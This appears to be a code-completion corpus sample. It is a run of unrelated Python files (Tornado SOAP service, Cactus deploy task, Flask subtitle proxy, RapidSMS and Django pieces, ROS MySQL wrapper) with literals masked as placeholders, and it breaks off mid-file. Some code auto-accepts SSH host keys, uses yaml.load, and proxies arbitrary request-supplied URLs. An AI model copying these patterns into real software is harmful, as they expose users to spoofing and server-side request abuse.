<s> import tornado . httpserver <EOL> import tornado . ioloop <EOL> from tornadows import soaphandler <EOL> from tornadows import webservices <EOL> from tornadows import complextypes <EOL> from tornadows . soaphandler import webservice <EOL> """<STR_LIT>""" <EOL> class Input ( complextypes . ComplexType ) : <EOL> idList = int <EOL> class Product ( complextypes . ComplexType ) : <EOL> id = int <EOL> name = str <EOL> price = float <EOL> stock = int <EOL> class List ( complextypes . ComplexType ) : <EOL> idList = int <EOL> product = [ Product ] <EOL> class ProductListService ( soaphandler . SoapHandler ) : <EOL> @ webservice ( _params = Input , _returns = List ) <EOL> def getProductList ( self , input ) : <EOL> id = input . idList <EOL> listOfProduct = List ( ) <EOL> listOfProduct . idList = id <EOL> for i in [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> ] : <EOL> reg = self . database ( i ) <EOL> output = Product ( ) <EOL> output . id = i <EOL> output . name = reg [ <NUM_LIT:0> ] <EOL> output . price = reg [ <NUM_LIT:1> ] <EOL> output . stock = reg [ <NUM_LIT:2> ] <EOL> listOfProduct . product . append ( output ) <EOL> return listOfProduct <EOL> def database ( self , id ) : <EOL> """<STR_LIT>""" <EOL> db = { <NUM_LIT:1> : ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT:100> ) , <EOL> <NUM_LIT:2> : ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> ) , <EOL> <NUM_LIT:3> : ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> ) , <EOL> <NUM_LIT:4> : ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> ) , <EOL> <NUM_LIT:5> : ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> ) , <EOL> <NUM_LIT:6> : ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> ) , <EOL> } <EOL> row = ( None , <NUM_LIT:0.0> , <NUM_LIT:0> ) <EOL> try : <EOL> row = db [ id ] <EOL> except : <EOL> None <EOL> return row <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> service = [ ( '<STR_LIT>' , ProductListService ) ] <EOL> app = webservices . WebService ( service ) <EOL> ws = tornado . httpserver . HTTPServer ( app ) <EOL> ws . 
listen ( <NUM_LIT> ) <EOL> tornado . ioloop . IOLoop . instance ( ) . start ( ) </s>
<s> __author__ = '<STR_LIT>' <EOL> import logging <EOL> import time <EOL> import json <EOL> from threading import Thread <EOL> import requests <EOL> import websocket <EOL> log = logging . getLogger ( '<STR_LIT>' ) <EOL> WEBSOCKET_URL = '<STR_LIT>' <EOL> class Listener ( Thread , websocket . WebSocketApp ) : <EOL> def __init__ ( self , account , <EOL> on_push = None , <EOL> http_proxy_host = None , <EOL> http_proxy_port = None ) : <EOL> """<STR_LIT>""" <EOL> self . _account = account <EOL> self . _api_key = self . _account . api_key <EOL> Thread . __init__ ( self ) <EOL> websocket . WebSocketApp . __init__ ( self , WEBSOCKET_URL + self . _api_key , <EOL> on_open = self . on_open , <EOL> on_message = self . on_message , <EOL> on_close = self . on_close ) <EOL> self . connected = False <EOL> self . last_update = time . time ( ) <EOL> self . on_push = on_push <EOL> self . history = None <EOL> self . clean_history ( ) <EOL> self . http_proxy_host = http_proxy_host <EOL> self . http_proxy_port = http_proxy_port <EOL> self . proxies = None <EOL> if http_proxy_port is not None and http_proxy_port is not None : <EOL> self . proxies = { <EOL> "<STR_LIT:http>" : "<STR_LIT>" + http_proxy_host + "<STR_LIT::>" + str ( http_proxy_port ) , <EOL> "<STR_LIT>" : "<STR_LIT>" + http_proxy_host + "<STR_LIT::>" + str ( http_proxy_port ) , <EOL> } <EOL> def clean_history ( self ) : <EOL> self . history = [ ] <EOL> def on_open ( self , ws ) : <EOL> self . connected = True <EOL> self . last_update = time . time ( ) <EOL> def on_close ( self , ws ) : <EOL> log . debug ( '<STR_LIT>' ) <EOL> self . connected = False <EOL> def on_message ( self , ws , message ) : <EOL> log . debug ( '<STR_LIT>' + message ) <EOL> try : <EOL> json_message = json . loads ( message ) <EOL> if json_message [ "<STR_LIT:type>" ] != "<STR_LIT>" : <EOL> self . on_push ( json_message ) <EOL> except Exception as e : <EOL> logging . 
exception ( e ) <EOL> def run_forever ( self , sockopt = None , sslopt = None , ping_interval = <NUM_LIT:0> , ping_timeout = None ) : <EOL> websocket . WebSocketApp . run_forever ( self , sockopt = sockopt , sslopt = sslopt , ping_interval = ping_interval , <EOL> ping_timeout = ping_timeout , <EOL> http_proxy_host = self . http_proxy_host , <EOL> http_proxy_port = self . http_proxy_port ) <EOL> def run ( self ) : <EOL> self . run_forever ( ) </s>
<s> import fnmatch <EOL> import logging <EOL> import getpass <EOL> import boto <EOL> import sys <EOL> from cactus . s3 . utils import fileList <EOL> import re <EOL> import os <EOL> import paramiko <EOL> import yaml <EOL> from . import BaseTask <EOL> from cactus . s3 . file import File <EOL> from paramiko import SFTPClient <EOL> from cactus . utils import to_unix_path <EOL> class DeployTask ( BaseTask ) : <EOL> """<STR_LIT>""" <EOL> local_settings = { } <EOL> config = { } <EOL> helptext_short = "<STR_LIT>" "<STR_LIT>" <EOL> @ classmethod <EOL> def conf ( cls , key , default = None ) : <EOL> return cls . local_settings . get ( key , cls . config . get ( key , default ) ) <EOL> @ classmethod <EOL> def run ( cls , * args , ** kwargs ) : <EOL> if len ( args ) > <NUM_LIT:3> : <EOL> print cls . usage ( ) <EOL> return <EOL> do_build = True <EOL> run_tests = False <EOL> target = "<STR_LIT:default>" <EOL> for arg in args : <EOL> m1 = re . match ( r'<STR_LIT>' , arg , re . I ) <EOL> m2 = re . match ( r'<STR_LIT>' , arg , re . I ) <EOL> if m1 : <EOL> do_build = m1 . group ( <NUM_LIT:1> ) . lower ( ) == "<STR_LIT:yes>" <EOL> elif m2 : <EOL> run_tests = m2 . group ( <NUM_LIT:1> ) . lower ( ) == "<STR_LIT:yes>" <EOL> else : <EOL> target = arg <EOL> try : <EOL> cls . local_settings = yaml . load ( <EOL> open ( os . path . join ( os . getcwd ( ) , "<STR_LIT>" ) , '<STR_LIT:r>' ) <EOL> ) . get ( target ) <EOL> except Exception , e : <EOL> cls . local_settings = { } <EOL> logging . warn ( "<STR_LIT>" . format ( e ) ) <EOL> from cactus import site as cactus_site <EOL> site = cactus_site . Site ( os . getcwd ( ) ) <EOL> site . verify ( ) <EOL> cls . config = site . config . get ( "<STR_LIT>" ) . get ( target , "<STR_LIT:default>" ) <EOL> deployment_type = cls . conf ( "<STR_LIT:type>" , "<STR_LIT>" ) <EOL> discard_files = cls . conf ( "<STR_LIT>" , [ ] ) <EOL> def createSSHClient ( server , port = <NUM_LIT> , user = None , password = None , privkey = None ) : <EOL> client = paramiko . 
SSHClient ( ) <EOL> client . load_system_host_keys ( ) <EOL> client . set_missing_host_key_policy ( paramiko . AutoAddPolicy ( ) ) <EOL> client . connect ( <EOL> server , <EOL> port = port , <EOL> username = user , <EOL> password = password , <EOL> key_filename = privkey , <EOL> ) <EOL> return client <EOL> if do_build or run_tests : <EOL> print "<STR_LIT>" <EOL> site . build ( dist = True ) <EOL> site . call_plugin_method ( "<STR_LIT>" ) <EOL> if run_tests : <EOL> if not site . run_tests ( ) : <EOL> logging . error ( "<STR_LIT>" ) <EOL> return <EOL> print u"<STR_LIT>" . format ( target ) <EOL> if deployment_type == "<STR_LIT>" : <EOL> host = cls . conf ( "<STR_LIT:host>" ) <EOL> port = int ( cls . conf ( "<STR_LIT:port>" , <NUM_LIT> ) ) <EOL> print "<STR_LIT>" . format ( host ) <EOL> auth_type = cls . conf ( "<STR_LIT>" , "<STR_LIT:password>" ) <EOL> try : <EOL> from win32com . shell import shellcon , shell <EOL> homedir = shell . SHGetFolderPath ( <NUM_LIT:0> , shellcon . CSIDL_APPDATA , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> except ImportError : <EOL> homedir = os . path . expanduser ( "<STR_LIT>" ) <EOL> if auth_type == "<STR_LIT>" : <EOL> try : <EOL> ssh = createSSHClient ( <EOL> host , <EOL> port = port , <EOL> user = cls . conf ( "<STR_LIT:user>" ) , <EOL> privkey = cls . conf ( "<STR_LIT>" , "<STR_LIT>" ) . format ( home = homedir ) , <EOL> ) <EOL> except paramiko . PasswordRequiredException : <EOL> ssh = createSSHClient ( <EOL> host , <EOL> port = port , <EOL> user = cls . conf ( "<STR_LIT:user>" ) , <EOL> privkey = cls . conf ( "<STR_LIT>" , "<STR_LIT>" ) . format ( home = homedir ) , <EOL> password = getpass . getpass ( prompt = "<STR_LIT>" ) , <EOL> ) <EOL> else : <EOL> user = cls . conf ( "<STR_LIT:user>" ) <EOL> if not user : <EOL> user = raw_input ( "<STR_LIT>" ) <EOL> ssh = createSSHClient ( <EOL> host , <EOL> port = port , <EOL> user = user , <EOL> password = getpass . getpass ( prompt = "<STR_LIT>" ) <EOL> ) <EOL> scp = SFTPClient . 
from_transport ( ssh . get_transport ( ) ) <EOL> dist_dir = os . path . abspath ( site . paths [ '<STR_LIT>' ] ) <EOL> remote_base = cls . conf ( "<STR_LIT:path>" ) <EOL> for ( path , dirs , files ) in os . walk ( dist_dir ) : <EOL> remote_path = path . replace ( dist_dir , '<STR_LIT>' ) <EOL> remote_path = re . sub ( r'<STR_LIT>' , '<STR_LIT>' , remote_path ) <EOL> remote_path = re . sub ( r'<STR_LIT>' , '<STR_LIT>' , remote_path ) <EOL> for d in dirs : <EOL> rdir = to_unix_path ( os . path . join ( remote_base , remote_path , d ) ) <EOL> try : <EOL> scp . stat ( rdir ) <EOL> except IOError : <EOL> scp . mkdir ( rdir ) <EOL> for f in files : <EOL> src = os . path . abspath ( os . path . join ( path , f ) ) <EOL> dest = to_unix_path ( os . path . join ( remote_base , remote_path , f ) ) <EOL> discard = False <EOL> for pattern in discard_files : <EOL> d = "<STR_LIT>" . format ( pattern ) <EOL> if fnmatch . fnmatch ( dest , d ) : <EOL> discard = True <EOL> if not discard : <EOL> logging . info ( "<STR_LIT>" . format ( src , dest ) ) <EOL> scp . put ( <EOL> src , <EOL> dest <EOL> ) <EOL> else : <EOL> logging . info ( "<STR_LIT>" . format ( src ) ) <EOL> site . call_plugin_method ( "<STR_LIT>" ) <EOL> elif deployment_type == "<STR_LIT>" : <EOL> key = cls . conf ( "<STR_LIT>" ) <EOL> secret = cls . conf ( "<STR_LIT>" ) <EOL> if not key : <EOL> key = raw_input ( "<STR_LIT>" ) <EOL> if not secret : <EOL> secret = raw_input ( "<STR_LIT>" ) <EOL> connection = boto . connect_s3 ( key . strip ( ) , secret . strip ( ) ) <EOL> try : <EOL> buckets = connection . get_all_buckets ( ) <EOL> except : <EOL> logging . error ( '<STR_LIT>' ) <EOL> return <EOL> bucket = cls . conf ( "<STR_LIT>" ) <EOL> if not bucket : <EOL> bucket = raw_input ( "<STR_LIT>" ) . strip ( ) . lower ( ) <EOL> if bucket not in [ b . name for b in buckets ] : <EOL> if raw_input ( '<STR_LIT>' ) == '<STR_LIT:y>' : <EOL> try : <EOL> created_bucket = connection . 
create_bucket ( bucket , policy = '<STR_LIT>' ) <EOL> except boto . exception . S3CreateError , e : <EOL> logging . error ( '<STR_LIT>' . format ( bucket ) ) <EOL> return <EOL> created_bucket . configure_website ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> try : <EOL> buckets = connection . get_all_buckets ( ) <EOL> except : <EOL> logging . error ( '<STR_LIT>' ) <EOL> return <EOL> selected_bucket = None <EOL> for b in buckets : <EOL> if b . name == bucket : <EOL> selected_bucket = b <EOL> if selected_bucket : <EOL> dist_dir = site . paths [ '<STR_LIT>' ] <EOL> for f in fileList ( dist_dir , relative = True ) : <EOL> s3_file = File ( site , f , cls . conf ( "<STR_LIT>" ) ) <EOL> discard = False <EOL> for pattern in discard_files : <EOL> if fnmatch . fnmatch ( f , pattern ) : <EOL> discard = True <EOL> if not discard : <EOL> s3_file . upload ( selected_bucket ) <EOL> else : <EOL> logging . info ( "<STR_LIT>" . format ( f ) ) <EOL> site . call_plugin_method ( "<STR_LIT>" ) <EOL> logging . info ( "<STR_LIT>" . format ( cls . conf ( "<STR_LIT>" ) ) ) <EOL> else : <EOL> logging . warn ( "<STR_LIT>" . format ( deployment_type ) ) </s>
import sublime_plugin


class ProjectManagerCloseWindow(sublime_plugin.WindowCommand):
    """Window command that tears down the project state before closing.

    Runs a project/workspace-specific command first, refuses to proceed
    while any view has unsaved changes, then issues the final two close
    commands.
    """

    def run(self):
        window = self.window
        # Choose the first command based on whether a project file is
        # attached to this window.
        first_command = '<STR_LIT>' if window.project_file_name() else '<STR_LIT>'
        window.run_command(first_command)
        # Bail out while any view still holds unsaved edits.
        if any(view.is_dirty() for view in window.views()):
            return
        window.run_command('<STR_LIT>')
        window.run_command('<STR_LIT>')
from unittest import suite


class DeferrableTestSuite(suite.TestSuite):
    r'''A TestSuite whose run() is a generator.

    Mirrors unittest.TestSuite.run() but yields control between every
    fixture step and test invocation so an external scheduler can
    interleave other work (cooperative / deferred execution).  If a test
    itself returns an iterable, each of its yielded values is re-yielded
    here.

    NOTE(review): relies on unittest's private helpers
    (suite._isnotsuite, _tearDownPreviousClass, _handleModuleFixture,
    _handleClassSetUp, _handleModuleTearDown) and private result
    attributes -- verify against the targeted stdlib version when
    upgrading Python.
    '''

    def run(self, result, debug=False):
        # Detect whether we are the outermost suite in this run; only the
        # outermost one performs the final class/module teardown below.
        topLevel = False
        if getattr(result, '<STR_LIT>', False) is False:
            result._testRunEntered = topLevel = True
        for test in self:
            if result.shouldStop:
                break
            if suite._isnotsuite(test):
                # A real test case: run class/module fixtures around it,
                # yielding after each step so the caller can interleave.
                self._tearDownPreviousClass(test, result)
                yield
                self._handleModuleFixture(test, result)
                yield
                self._handleClassSetUp(test, result)
                yield
                result._previousTestClass = test.__class__
                # Skip the test when its class or module setup failed.
                if (getattr(test.__class__, '<STR_LIT>', False) or
                        getattr(result, '<STR_LIT>', False)):
                    continue
            if not debug:
                deferred = test(result)
                # A deferrable test returns an iterable of work units;
                # re-yield each of them.
                if deferred is not None and hasattr(deferred, '<STR_LIT>'):
                    for x in deferred:
                        yield x
            else:
                deferred = test.debug()
                if deferred is not None and hasattr(deferred, '<STR_LIT>'):
                    for x in deferred:
                        yield x
            yield
        if topLevel:
            # Outermost suite: finish remaining class/module teardown.
            self._tearDownPreviousClass(None, result)
            yield
            self._handleModuleTearDown(result)
            yield
            result._testRunEntered = False
<s> from flask import render_template , redirect , flash , current_app , url_for , session , jsonify , request , Response <EOL> from flask . ext . babel import gettext <EOL> from werkzeug . contrib . cache import SimpleCache <EOL> import os <EOL> import urllib <EOL> import gzip <EOL> import requests <EOL> import StringIO <EOL> import re <EOL> import xmlrpclib <EOL> from os_util import OSFile <EOL> from . import mod <EOL> cache = SimpleCache ( ) <EOL> OST_API = '<STR_LIT>' <EOL> OST_USERAGENT = '<STR_LIT>' <EOL> @ mod . route ( '<STR_LIT:/>' ) <EOL> def index ( ) : <EOL> if not os . path . isdir ( current_app . config [ '<STR_LIT>' ] ) : <EOL> flash ( gettext ( "<STR_LIT>" , directory = directory ) ) <EOL> return redirect ( "<STR_LIT:/>" ) <EOL> return render_template ( '<STR_LIT>' , movies = get_movies ( ) ) <EOL> @ mod . route ( '<STR_LIT>' ) <EOL> def refresh ( ) : <EOL> cache . set ( '<STR_LIT>' , None , timeout = <NUM_LIT:7> * <NUM_LIT> * <NUM_LIT> * <NUM_LIT> ) <EOL> return redirect ( url_for ( '<STR_LIT>' ) ) <EOL> @ mod . route ( '<STR_LIT>' ) <EOL> def player ( ) : <EOL> return render_template ( '<STR_LIT>' ) <EOL> @ mod . route ( '<STR_LIT>' ) <EOL> def control ( ) : <EOL> return render_template ( '<STR_LIT>' , movies = get_movies ( ) ) <EOL> @ mod . route ( '<STR_LIT>' ) <EOL> def find_subtitles ( ) : <EOL> rel_path = request . args . get ( '<STR_LIT:src>' ) [ len ( current_app . config [ "<STR_LIT>" ] ) + <NUM_LIT:1> : ] <EOL> json = cache . get ( rel_path ) <EOL> if json == None : <EOL> path = os . path . join ( <EOL> current_app . config [ '<STR_LIT>' ] , <EOL> urllib . unquote ( rel_path ) . decode ( '<STR_LIT:utf8>' ) <EOL> ) <EOL> subtitles = [ ] <EOL> results = os_search ( path ) <EOL> try : <EOL> for sub in results : <EOL> if sub [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> subtitles . 
append ( { <EOL> '<STR_LIT:url>' : sub [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : sub [ '<STR_LIT>' ] , <EOL> '<STR_LIT:name>' : sub [ '<STR_LIT>' ] <EOL> } ) <EOL> except TypeError : <EOL> pass <EOL> json = jsonify ( <EOL> subtitles = subtitles <EOL> ) <EOL> cache . set ( rel_path , json , timeout = <NUM_LIT:7> * <NUM_LIT> * <NUM_LIT> * <NUM_LIT> ) <EOL> return json <EOL> @ mod . route ( "<STR_LIT>" ) <EOL> def subtitle_proxy ( ) : <EOL> src = request . args . get ( '<STR_LIT:src>' ) <EOL> vtt = cache . get ( src ) <EOL> if vtt == None : <EOL> r = requests . get ( src ) <EOL> gzipped = StringIO . StringIO ( r . content ) <EOL> gzipped . seek ( <NUM_LIT:0> ) <EOL> srt = gzip . GzipFile ( fileobj = gzipped , mode = '<STR_LIT:rb>' ) <EOL> vtt = srt_to_vtt ( srt . read ( ) ) <EOL> cache . set ( src , vtt , timeout = <NUM_LIT:7> * <NUM_LIT> * <NUM_LIT> * <NUM_LIT> ) <EOL> return Response ( vtt , mimetype = '<STR_LIT>' ) <EOL> def os_search ( path ) : <EOL> xmlrpc , token = os_connect ( ) <EOL> xmlrpclib . Marshaller . dispatch [ type ( <NUM_LIT:0> L ) ] = lambda _ , v , w : w ( "<STR_LIT>" % v ) <EOL> os_file = OSFile ( path ) <EOL> query = xmlrpc . SearchSubtitles ( token , [ <EOL> { <EOL> '<STR_LIT>' : current_app . config [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : os_file . hash_file ( ) , <EOL> '<STR_LIT>' : os_file . size , <EOL> } <EOL> ] ) <EOL> if len ( query . get ( '<STR_LIT:data>' ) ) > <NUM_LIT:0> : <EOL> return query . get ( '<STR_LIT:data>' ) <EOL> filename = os . path . splitext ( os . path . basename ( path ) ) [ <NUM_LIT:0> ] . replace ( "<STR_LIT:.>" , "<STR_LIT:U+0020>" ) <EOL> query = xmlrpc . SearchSubtitles ( token , [ <EOL> { <EOL> '<STR_LIT>' : current_app . config [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : filename , <EOL> } <EOL> ] ) <EOL> return query . get ( '<STR_LIT:data>' ) <EOL> def os_connect ( ) : <EOL> xmlrpc = xmlrpclib . ServerProxy ( OST_API , allow_none = True ) <EOL> login = xmlrpc . LogIn ( <EOL> current_app . 
config [ '<STR_LIT>' ] , <EOL> current_app . config [ '<STR_LIT>' ] , <EOL> "<STR_LIT>" , <EOL> OST_USERAGENT <EOL> ) <EOL> if login . get ( '<STR_LIT:status>' ) == '<STR_LIT>' : <EOL> return ( xmlrpc , login . get ( '<STR_LIT>' ) ) <EOL> def srt_to_vtt ( srt ) : <EOL> vtt = "<STR_LIT>" <EOL> vtt += re . sub ( r'<STR_LIT>' , r'<STR_LIT>' , srt ) <EOL> return vtt <EOL> def get_movies ( ) : <EOL> movies = cache . get ( "<STR_LIT>" ) <EOL> if movies is None : <EOL> movies = find_movies ( ) <EOL> cache . set ( '<STR_LIT>' , movies , timeout = <NUM_LIT:7> * <NUM_LIT> * <NUM_LIT> * <NUM_LIT> ) <EOL> return movies <EOL> def find_movies ( ) : <EOL> directory = current_app . config [ '<STR_LIT>' ] <EOL> extensions = current_app . config [ '<STR_LIT>' ] <EOL> movies = { } <EOL> rootPathLen = len ( directory ) <EOL> for root , dirnames , filenames in os . walk ( directory , followlinks = True ) : <EOL> for filename in filenames : <EOL> u_filename = unicode ( filename , '<STR_LIT:utf-8>' ) <EOL> u_root = unicode ( root , '<STR_LIT:utf-8>' ) <EOL> if u_filename . lower ( ) . endswith ( extensions ) : <EOL> firstChar = u_filename [ <NUM_LIT:0> ] . upper ( ) <EOL> if not firstChar in movies . keys ( ) : <EOL> movies [ firstChar ] = [ ] <EOL> movies [ firstChar ] . append ( { <EOL> '<STR_LIT:path>' : os . path . join ( u_root , u_filename ) [ rootPathLen : ] , <EOL> '<STR_LIT:name>' : u_filename <EOL> } ) <EOL> return movies </s>
from .outgoing import OutgoingMessage


class ErrorMessage(OutgoingMessage):
    """An outgoing message used for error replies.

    NOTE(review): adds no behavior of its own; the subclass appears to
    exist so error responses can be distinguished from regular outgoing
    messages by type -- confirm against the senders that construct it.
    """
    pass
from setuptools import setup, find_packages

# Distribution metadata and packaging configuration for this project.
setup(
    name="<STR_LIT>",
    version="<STR_LIT>",
    license="<STR_LIT>",
    # Runtime dependencies installed alongside the package.
    install_requires=[
        "<STR_LIT>",
        "<STR_LIT>",
        "<STR_LIT>",
        "<STR_LIT>"
    ],
    # Standalone executable script(s) shipped with the package.
    scripts=["<STR_LIT>"],
    # Maps the package root onto a subdirectory of the repository
    # (src-style layout -- TODO confirm the actual directory name).
    package_dir={"<STR_LIT>": "<STR_LIT>"},
    packages=find_packages("<STR_LIT>", exclude=['<STR_LIT>']),
    include_package_data=True,
    author="<STR_LIT>",
    author_email="<STR_LIT>",
    maintainer="<STR_LIT>",
    maintainer_email="<STR_LIT>",
    description="<STR_LIT>",
    url="<STR_LIT>"
)
import logging
import pprint
from django.http import HttpResponse, HttpResponseBadRequest
from django.views.generic.edit import CreateView
from rapidsms.backends.kannel.models import DeliveryReport
from rapidsms.backends.kannel.forms import KannelForm
from rapidsms.backends.http.views import BaseHttpBackendView

logger = logging.getLogger(__name__)


class KannelBackendView(BaseHttpBackendView):
    """Accepts incoming messages that Kannel delivers over HTTP GET."""

    http_method_names = ['<STR_LIT>']
    form_class = KannelForm

    def get(self, *args, **kwargs):
        """Kannel sends GET requests; funnel them through the POST path."""
        return self.post(*args, **kwargs)

    def get_form_kwargs(self):
        # Bind the form to the query string rather than the request body.
        form_kwargs = super(KannelBackendView, self).get_form_kwargs()
        form_kwargs['<STR_LIT:data>'] = self.request.GET
        return form_kwargs

    def form_valid(self, form):
        super(KannelBackendView, self).form_valid(form)
        return HttpResponse('<STR_LIT>')


class DeliveryReportView(CreateView):
    """Records delivery reports that Kannel posts back via GET."""

    model = DeliveryReport
    fields = ('<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT:status>', '<STR_LIT>',)
    http_method_names = ['<STR_LIT>']

    def get(self, *args, **kwargs):
        """Reports arrive as GET requests; treat them as creations."""
        self.object = None
        return self.post(*args, **kwargs)

    def get_form_kwargs(self):
        # Bind the form to the query string rather than the request body.
        form_kwargs = super(DeliveryReportView, self).get_form_kwargs()
        form_kwargs['<STR_LIT:data>'] = self.request.GET
        return form_kwargs

    def form_valid(self, form):
        self.object = form.save()
        return HttpResponse('<STR_LIT>')

    def form_invalid(self, form):
        """Log the malformed report in detail, then reply 400."""
        logger.error("<STR_LIT>", self.request.method)
        logger.error(pprint.pformat(form.data))
        first_errors = dict((field, messages[0]) for field, messages in form.errors.items())
        logger.error(str(first_errors))
        non_field = form.non_field_errors()
        if non_field:
            logger.error(non_field)
        return HttpResponseBadRequest('<STR_LIT>')
from django import forms
from django.core.exceptions import ValidationError


class SmallFileField(forms.FileField):
    """A FileField whose widget renders with a compact size attribute."""

    def widget_attrs(self, widget):
        # Keep the file-input element visually small.
        return {"<STR_LIT:size>": 10}


class MessageForm(forms.Form):
    """Form for sending a test message to one identity, or in bulk via a file."""

    identity = forms.CharField(
        label="<STR_LIT>",
        max_length=100,
        help_text="<STR_LIT>" +
        "<STR_LIT>")
    text = forms.CharField(
        label="<STR_LIT>",
        required=False,
        widget=forms.widgets.Textarea({
            "<STR_LIT>": 30,
            "<STR_LIT>": 4}))
    bulk = SmallFileField(
        label="<STR_LIT>",
        required=False,
        help_text="<STR_LIT>" +
        "<STR_LIT>")

    def clean_identity(self):
        """Strip the identity and require it to be numeric.

        Bug fix: the original only bound `identity` when the key was
        present in cleaned_data, so the trailing `return identity`
        raised NameError whenever the field had failed earlier
        validation.
        """
        identity = self.cleaned_data.get('<STR_LIT>')
        if identity is None:
            # Field failed earlier validation; nothing more to check.
            return identity
        identity = identity.strip()
        if not identity.isnumeric():
            raise ValidationError("<STR_LIT>")
        return identity
from django.conf.urls import url

from . import views

# Route table for this app: a single pattern mapped to the message_log
# view.  NOTE(review): defined as a tuple; newer Django versions expect
# urlpatterns to be a list -- confirm before upgrading.
urlpatterns = (
    url(r'<STR_LIT>', views.message_log, name="<STR_LIT>"),
)
from __future__ import unicode_literals

from django.db import models, migrations


class Migration(migrations.Migration):
    # Auto-generated schema migration: redefines one CharField
    # (max_length=6, optional) on the referenced model.  Avoid editing
    # generated migrations by hand.

    dependencies = [
        ('<STR_LIT>', '<STR_LIT>'),
    ]

    operations = [
        migrations.AlterField(
            model_name='<STR_LIT>',
            name='<STR_LIT>',
            field=models.CharField(help_text='<STR_LIT>', max_length=6, blank=True),
            preserve_default=True,
        ),
    ]
from django import template

register = template.Library()


@register.inclusion_tag('<STR_LIT>')
def render_form(form):
    """Inclusion tag: expose the given form to the configured template."""
    context = {"<STR_LIT>": form}
    return context
from optparse import make_option

from django.core.management.base import BaseCommand, CommandError

try:
    # Newer Django: resolve apps and models through the app registry.
    from django.apps import apps
    get_app = apps.get_app_config
    from django.apps.registry import AppConfig
    get_models = AppConfig.get_models
except ImportError:
    # Older Django: fall back to the legacy model loader.
    from django.db.models.loading import get_app, get_models

# Text templates for the generated output.
serializers = """<STR_LIT>"""
serializer_class_def = """<STR_LIT>"""
viewsets = """<STR_LIT>"""
viewset_class_def = """<STR_LIT>"""
urls = """<STR_LIT>"""
router_def = "<STR_LIT>"


class Command(BaseCommand):
    """Prints generated serializer/viewset/url scaffolding for an app's models."""

    args = '<STR_LIT>'
    help = '<STR_LIT>'
    option_list = BaseCommand.option_list + (
        make_option('<STR_LIT>',
                    action='<STR_LIT:store_true>',
                    dest='<STR_LIT>',
                    default=False,
                    help='<STR_LIT>'),
        make_option('<STR_LIT>',
                    action='<STR_LIT:store_true>',
                    dest='<STR_LIT>',
                    default=False,
                    help='<STR_LIT>'),
    )

    def handle(self, *args, **options):
        if len(args) != 1:
            raise CommandError('<STR_LIT>')
        app_name = args[0]
        app = get_app(app_name)
        model_names = [m.__name__ for m in get_models(app)]
        if options['<STR_LIT>']:
            # Emit viewset classes plus the imports they need.
            serializer_names = [n + '<STR_LIT>' for n in model_names]
            bodies = [
                viewset_class_def % {
                    '<STR_LIT>': n,
                }
                for n in model_names
            ]
            print(viewsets % {
                '<STR_LIT>': '<STR_LIT>' + app_name + '<STR_LIT>' + '<STR_LIT:U+002CU+0020>'.join(model_names),
                '<STR_LIT>': '<STR_LIT>' + app_name + '<STR_LIT>' + '<STR_LIT:U+002CU+0020>'.join(serializer_names),
                '<STR_LIT>': '<STR_LIT>'.join(bodies),
            })
        elif options['<STR_LIT>']:
            # Emit a router with one registration per model.
            view_names = [n + '<STR_LIT>' for n in model_names]
            registrations = [
                router_def % {
                    '<STR_LIT>': n.lower() + '<STR_LIT:s>',
                    '<STR_LIT>': n,
                }
                for n in model_names
            ]
            print(urls % {
                '<STR_LIT>': '<STR_LIT>' + app_name + '<STR_LIT>' + '<STR_LIT:U+002CU+0020>'.join(view_names),
                '<STR_LIT>': '<STR_LIT>'.join(registrations),
            })
        else:
            # Default mode: emit serializer classes.
            bodies = [
                serializer_class_def % {
                    '<STR_LIT>': n,
                }
                for n in model_names
            ]
            print(serializers % {
                '<STR_LIT>': '<STR_LIT>' + app_name + '<STR_LIT>' + '<STR_LIT:U+002CU+0020>'.join(model_names),
                '<STR_LIT>': '<STR_LIT>'.join(bodies),
            })
<s> import rospy <EOL> import MySQLdb as mdb <EOL> import sys <EOL> from rapp_platform_ros_communications . srv import ( <EOL> fetchDataSrv , <EOL> fetchDataSrvResponse , <EOL> writeDataSrv , <EOL> writeDataSrvResponse , <EOL> deleteDataSrv , <EOL> deleteDataSrvResponse , <EOL> updateDataSrv , <EOL> updateDataSrvResponse , <EOL> whatRappsCanRunSrv , <EOL> whatRappsCanRunSrvResponse <EOL> ) <EOL> from rapp_platform_ros_communications . msg import ( <EOL> StringArrayMsg <EOL> ) <EOL> from std_msgs . msg import ( <EOL> String <EOL> ) <EOL> class MySQLdbWrapper : <EOL> def __init__ ( self ) : <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , fetchDataSrv , self . tblUserFetchDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , writeDataSrv , self . tblUserWriteDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , deleteDataSrv , self . tblUserDeleteDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , updateDataSrv , self . tblUserUpdateDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , 